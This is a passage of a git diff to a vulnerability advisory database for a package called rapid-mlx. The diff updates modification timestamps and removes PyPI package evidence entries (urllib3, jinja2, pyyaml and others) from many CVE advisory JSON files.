"high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-9015.json b/advisories/BREW-rapid-mlx-CVE-2016-9015.json index e5f1979b789..e8b1d0f7e73 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-9015.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-9015", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2017-11424.json b/advisories/BREW-rapid-mlx-CVE-2017-11424.json index 2ab4bdf2514..1f8fabc8f93 100644 --- a/advisories/BREW-rapid-mlx-CVE-2017-11424.json +++ b/advisories/BREW-rapid-mlx-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2017-11424", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2017-18342.json b/advisories/BREW-rapid-mlx-CVE-2017-18342.json index 1e972eeebb3..d14b5f9504c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2017-18342.json +++ b/advisories/BREW-rapid-mlx-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2017-18342", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-1000518.json b/advisories/BREW-rapid-mlx-CVE-2018-1000518.json index f015671a880..5e286f6bcb8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-1000518.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-1000518", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "17.1", - "key": "pkg:pypi/websockets@17.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-18074.json b/advisories/BREW-rapid-mlx-CVE-2018-18074.json index 727fb91cf63..5930bed77cd 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-18074.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-18074", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-20060.json b/advisories/BREW-rapid-mlx-CVE-2018-20060.json index d72c8816bcb..8862c96d439 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-20060.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-20060", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-25091.json b/advisories/BREW-rapid-mlx-CVE-2018-25091.json index 2ae1e6f0d72..37adc029b6a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-25091.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-25091", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-10906.json b/advisories/BREW-rapid-mlx-CVE-2019-10906.json index c999c6722eb..6cf5526f32f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-10906.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-10906", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-11236.json b/advisories/BREW-rapid-mlx-CVE-2019-11236.json index 35f9cf81431..0733acd2bea 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-11236.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-11236", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-11324.json b/advisories/BREW-rapid-mlx-CVE-2019-11324.json index b6a3cc7b55a..479aff108dc 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-11324.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-11324", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-18874.json b/advisories/BREW-rapid-mlx-CVE-2019-18874.json index 0e1f0995bf0..2539d70c8e4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-18874.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-18874", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-20477.json b/advisories/BREW-rapid-mlx-CVE-2019-20477.json index fd13a151727..58dbaf6d213 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-20477.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-20477", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-14343.json b/advisories/BREW-rapid-mlx-CVE-2020-14343.json index b2183b5049d..87975958738 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-14343.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-14343", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-1747.json b/advisories/BREW-rapid-mlx-CVE-2020-1747.json index ecb568e10a6..b1247a79812 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-1747.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-1747", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-26137.json b/advisories/BREW-rapid-mlx-CVE-2020-26137.json index f6dd26146a4..4c10039d176 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-26137.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-26137", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-28493.json b/advisories/BREW-rapid-mlx-CVE-2020-28493.json index e29095b952c..a15243e4eb8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-28493.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-28493", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7212.json b/advisories/BREW-rapid-mlx-CVE-2020-7212.json index 708d5037154..ae407a8e36e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7212.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7212", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7694.json b/advisories/BREW-rapid-mlx-CVE-2020-7694.json index 38dcdb129ff..9821f9fe928 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7694.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7694", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-23T21:33:37Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.4", - "key": "pkg:pypi/uvicorn@0.52.4", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7695.json b/advisories/BREW-rapid-mlx-CVE-2020-7695.json index 8d16efc5b73..349cc37324e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7695.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7695", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-23T21:33:37Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.4", - "key": "pkg:pypi/uvicorn@0.52.4", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-20270.json b/advisories/BREW-rapid-mlx-CVE-2021-20270.json index 40b4ae2c21e..beb92f0a6ff 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-20270.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-20270", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-27291.json b/advisories/BREW-rapid-mlx-CVE-2021-27291.json index e56e3c7c713..3a1446d4a43 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-27291.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-27291", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-28363.json b/advisories/BREW-rapid-mlx-CVE-2021-28363.json index 6f258eeb472..2f5629b0436 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-28363.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-28363", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-32677.json b/advisories/BREW-rapid-mlx-CVE-2021-32677.json index 96123285cb0..074d6f3a60f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-32677.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-32677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-32677", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:35:32Z", "upstream": [ "GHSA-8h2j-cgx8-6xv7", "CVE-2021-32677", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastapi", - "subject_version": "0.141.1", - "key": "pkg:pypi/fastapi@0.141.1", - "resource": "fastapi" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-33503.json b/advisories/BREW-rapid-mlx-CVE-2021-33503.json index bd98e3b3504..58e311d5b2b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-33503.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-33503", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-33880.json b/advisories/BREW-rapid-mlx-CVE-2021-33880.json index b2c10f6053e..03da5b45ff3 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-33880.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-33880", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "17.1", - "key": "pkg:pypi/websockets@17.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-41945.json b/advisories/BREW-rapid-mlx-CVE-2021-41945.json index a40b8d817af..6076b59c801 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-41945.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-41945", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-1941.json b/advisories/BREW-rapid-mlx-CVE-2022-1941.json index 822076a3b98..5c64e424ed4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-1941.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-1941.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-1941", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8gq9-2x98-w8hf", "CVE-2022-1941", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-29217.json b/advisories/BREW-rapid-mlx-CVE-2022-29217.json index ef0b5ab3ff4..6187bd7e56a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-29217.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-29217", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-40896.json b/advisories/BREW-rapid-mlx-CVE-2022-40896.json index e7377aa0561..b54ad4f3eab 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-40896.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2022-40896", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-26302.json b/advisories/BREW-rapid-mlx-CVE-2023-26302.json index 2423628c9a8..d5fe0991f82 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-26302.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-26302", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-26303.json b/advisories/BREW-rapid-mlx-CVE-2023-26303.json index 2e6a894cdc2..6452c7ce8f3 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-26303.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-26303", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-2800.json b/advisories/BREW-rapid-mlx-CVE-2023-2800.json index 34fd5f91e44..acbb8c7fec0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-2800.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-2800.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-2800", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-282v-666c-3fvg", "CVE-2023-2800", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2023-29159.json b/advisories/BREW-rapid-mlx-CVE-2023-29159.json index 733cb3cd222..f9bf5f39ee0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2023-29159.json +++ b/advisories/BREW-rapid-mlx-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2023-29159", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v5gw-mw7f-84px", 